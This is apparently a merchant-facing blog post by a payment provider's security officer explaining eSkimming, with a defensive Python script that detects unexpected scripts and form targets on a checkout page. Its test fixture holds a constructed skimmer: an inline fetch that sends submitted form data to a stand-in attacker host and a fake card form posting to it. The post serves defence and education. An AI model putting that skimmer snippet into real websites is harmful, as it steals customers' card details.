Cybersecurity is often discussed in dramatic terms – large breaches, sophisticated attacks, headline-making incidents. In reality, many security failures begin much more quietly.
QuietChain is a new blog series written by James Lugton, Security Officer and Infrastructure Specialist at Nochex – one of the UK’s first online payment service providers, recently acquired by PAYSTRAX. With over five years of hands-on experience in cybersecurity, James specialises in translating complex threats into everyday situations people can actually recognise and act on.
The first post in the QuietChain series explores eSkimming: what it is, how it works, and why even well-run online businesses can fall victim to it. With AI tooling in the hands of bad actors and a large population of ageing websites, the threat is becoming more frequent.
The Door Left Open
Most problems in life do not arrive with flashing lights. They slip in quietly, the way a draft moves through a room when a door has not been closed properly. You do not notice the moment until it happens, only the feeling that something is slightly off.
Websites behave the same way. They do not shout when they are getting old or warn you when a plugin has not been updated in months. They just keep going… until they STOP.
Sophie’s online shop was a perfect example of this. A small business she had built with care, a checkout that felt smooth, a routine she trusted. Then one morning, a message arrived from a customer: “My bank flagged a suspicious transaction after buying from your site.”
That is the kind of message that makes your stomach drop. Not because you have done something wrong, but because you genuinely do not know what has happened. There were no errors, no warnings, nothing broken – just one outdated plugin, a tiny thing she had not thought about in months. And that was enough.
Attackers had slipped in a few lines of hidden code. Nothing dramatic, nothing visible. Just a quiet watcher sitting inside her checkout, collecting every card number typed in. The purchases still went through normally, customers had no idea, and the code sat there waiting, invisible, for as long as it could.
That is eSkimming.
It is also known as web skimming, formjacking, or a Magecart attack. Different names for the same basic idea: attackers inject malicious JavaScript into a merchant’s payment page to capture payment details.
Sometimes the script runs quietly in the customer’s browser, copying card details as they are typed or when the form is submitted, and sending them to a server the attacker controls, often without breaking the checkout at all. The purchase still goes through normally, and nothing looks suspicious until a customer’s bank flags fraudulent activity later.
In other cases, the injected code is more “hands-on”. It can place a fake card form on top of the real one, or replace the legitimate form entirely. The customer enters their details and hits submit; the fake form sends them to the attacker, shows a generic “something went wrong” message, and redirects back to the real checkout to try again. From the customer’s perspective it feels like a normal website hiccup. From the attacker’s perspective, it is a clean way to collect card details while the merchant still receives the order. This second variant works even when the real card form is hosted by your payment provider, because the fake form lives on the merchant’s own page, not the provider’s.
eSkimming does not smash the door down. It waits for the door you forgot to close.

Why does eSkimming happen?
Because life is busy. Small businesses juggle everything – stock, customers, emails, suppliers, family, late nights, early mornings. Nobody wakes up thinking, “Today I will check every plugin, password, and access log.”
Websites age quietly, and attackers look for the quiet places. A missed update to a plugin or content management system leaves a known vulnerability exposed, and attackers actively scan the internet for exactly those weaknesses. A reused password or a default admin account that was never changed gives them a way in. One small gap, left open long enough, is all it takes. Worse, eSkimming attacks can go undetected for months. By then it may not only be card details that have been exposed, but also other customer data entered on the same forms, such as full names, email addresses and postal addresses. The impact can extend far beyond a single fraudulent transaction to customer trust and long-term reputation.
What are merchants responsible for?
Even when a third-party payment provider handles card data on your behalf (which is exactly what reduces your PCI DSS scope to the lighter SAQ A questionnaire), your own website environment still matters. Attackers do not need to reach your payment provider directly. They just need to compromise your website – the pages that display the checkout and hand the customer over to the provider – and that is often enough for an eSkimming attack to succeed.
Security in this context is shared. A payment partner can reduce exposure and add layers of protection, but merchants are still responsible for maintaining their own environment.
In practice, this means:
✅ Keep your site, plugins and software updated – vulnerabilities in outdated code are one of the most common entry points for eSkimming attacks.
✅ Avoid default usernames and passwords on any web-facing system or admin panel.
✅ Know who has access to your site and remove accounts that are no longer needed.
✅ Check occasionally that nothing unusual has appeared in your site’s code or behaviour – for example, a script loading from a domain you do not recognise, an inline script nobody on your team added, or a checkout form posting anywhere other than your own site or your payment provider.
eSkimming thrives on the things that quietly slip off the to-do list. These are not highly technical tasks. They are digital housekeeping: the equivalent of locking up at night, checking the back door is closed, and not leaving the keys under the mat.
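The fourth item above, “check that nothing unusual has appeared in your site’s code”, is the one merchants most often skip because it sounds vague. The following is an added example, not code from this post or from Nochex, of what that check can look like in practice: a stdlib-only Python script that parses a saved copy of the checkout page, records a baseline of which hosts scripts load from, the hashes of inline scripts, and which hosts forms post to, and then reports anything on a later copy that is not in the baseline. The merchant host (shop.example), payment host (pay.example), attacker host (cdn-stats-collector.invalid) and both sample pages are constructed for illustration; the injected snippet in the second page is only a stand-in for the kind of code the post describes, so the hash check has something to catch.

```python
"""Baseline-and-diff check for unexpected scripts and form targets on a checkout page.

Added example, not the post's or Nochex's own tooling. All hosts and pages
below are constructed; '.invalid' is a reserved TLD that never resolves.
"""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse


class PageInventory(HTMLParser):
    """Collect external script srcs, inline script bodies and form actions."""

    def __init__(self):
        super().__init__()
        self.external_scripts = []   # values of <script src="...">
        self.inline_scripts = []     # bodies of <script> tags without src
        self.form_actions = []       # values of <form action="...">
        self._in_inline_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script":
            if attrs.get("src"):
                self.external_scripts.append(attrs["src"])
            else:
                self._in_inline_script = True
                self._buf = []
        elif tag == "form":
            self.form_actions.append(attrs.get("action") or "")

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies through handle_data (CDATA mode).
        if self._in_inline_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline_script:
            self.inline_scripts.append("".join(self._buf).strip())
            self._in_inline_script = False


def sha256(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def host_of(url, page_host):
    """Host a URL points at; relative URLs ('/static/x.js') belong to the page itself."""
    netloc = urlparse(url).netloc
    return netloc.lower() if netloc else page_host


def inventory(html):
    parser = PageInventory()
    parser.feed(html)
    return parser


def baseline_from(html, page_host):
    """Record a known-good page: allowed script hosts, inline hashes, form hosts."""
    inv = inventory(html)
    return {
        "script_hosts": {host_of(s, page_host) for s in inv.external_scripts},
        "inline_hashes": {sha256(body) for body in inv.inline_scripts},
        "form_hosts": {host_of(a, page_host) for a in inv.form_actions},
    }


def check_page(html, baseline, page_host):
    """Return a list of findings; an empty list means the page matches the baseline."""
    inv = inventory(html)
    findings = []
    for src in inv.external_scripts:
        h = host_of(src, page_host)
        if h not in baseline["script_hosts"]:
            findings.append(f"new external script host: {h} ({src})")
    for body in inv.inline_scripts:
        if sha256(body) not in baseline["inline_hashes"]:
            findings.append(f"unknown inline script (sha256 {sha256(body)[:12]}...)")
    for action in inv.form_actions:
        h = host_of(action, page_host)
        if h not in baseline["form_hosts"]:
            findings.append(f"form posts to unexpected host: {h} ({action})")
    return findings


PAGE_HOST = "shop.example"  # constructed merchant host

# Constructed known-good checkout: one first-party script, one inline setting,
# and a form that hands the customer over to the hosted payment page.
GOOD_PAGE = """<html><body>
<script src="/static/checkout.js"></script>
<script>window.basketTotal = 42.00;</script>
<form id="pay" action="https://pay.example/hosted/start" method="post">
  <button>Pay now</button>
</form>
</body></html>"""

# The same page after an injection of the kind the post describes (constructed):
# a script from a host the merchant never chose, an inline listener that copies
# submitted fields elsewhere, and a fake card form posting to the attacker.
SKIMMED_PAGE = """<html><body>
<script src="/static/checkout.js"></script>
<script>window.basketTotal = 42.00;</script>
<script src="//cdn-stats-collector.invalid/analytics.js"></script>
<script>document.addEventListener("submit", function (e) {
  fetch("https://cdn-stats-collector.invalid/c", {method: "POST", body: new FormData(e.target)});
});</script>
<form id="pay" action="https://pay.example/hosted/start" method="post">
  <button>Pay now</button>
</form>
<form id="card" action="https://cdn-stats-collector.invalid/card" method="post">
  <input name="pan"><input name="cvv"><button>Pay</button>
</form>
</body></html>"""

if __name__ == "__main__":
    base = baseline_from(GOOD_PAGE, PAGE_HOST)
    for finding in check_page(SKIMMED_PAGE, base, PAGE_HOST):
        print("ALERT:", finding)
```

In use, the baseline is taken from a copy of the page fetched right after a deploy you trust, and the check runs on a schedule against a fresh fetch; any finding is a reason to look at the site before the bank does. Two caveats: the baseline has to be refreshed deliberately after every legitimate change, or the alerts become noise that gets ignored; and allowlisting by host does not help if a host you trust is itself compromised, which is the supply-chain variant of the same attack and calls for pinning script hashes (Subresource Integrity) rather than hosts.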
Where a PayFac / Payment Orchestration Platform helps
A good payments partner does not replace your own effort but it does strengthen it. Security works best when both sides actively do their part.
When your payment pages are hosted by your provider rather than sitting on your own site, card data never touches your environment in the first place. That is a meaningful reduction in eSkimming risk, not just a compliance convenience, because an attacker who finds their way into your site cannot read card numbers from a form you do not host. It is a reduction, not an elimination: the page that sends the customer to the hosted payment page is still yours, and an attacker who controls it can put a fake card form in front of the real one, as described above. Keeping that hand-off page clean remains your job.
Beyond that, a well-built platform can:
✅ Monitor for unusual transaction behaviour
✅ Flag suspicious patterns early
✅ Apply consistent fraud controls
✅ Enforce security standards across environments
This creates an additional safety layer that many small and mid-sized merchants would struggle to build alone. Think of it as having someone watching the back door while you focus on running the shop.
The quiet truth
Most breaches do not come from dramatic failures. They come from everyday moments: the things we forget, the updates we postpone, the habits we mean to fix but never quite get to.
Sophie’s story is not unusual; eSkimming is one of the most common forms of payment fraud targeting online merchants today. And the merchants it tends to catch are not the careless ones. On the contrary, they are the busy ones, the ones building something real, who simply did not know that one small gap was enough.
Security is not about being perfect. It is about being consistent.
Regular habits + strong partners = real protection.
Next in the QuietChain series…
What happens when attackers come back for a second round, and why paying a ransom once puts a target on your back.
For other cybersecurity insights from James in the meantime, head over to his blog ‘Security e-drift: the quiet compromise’.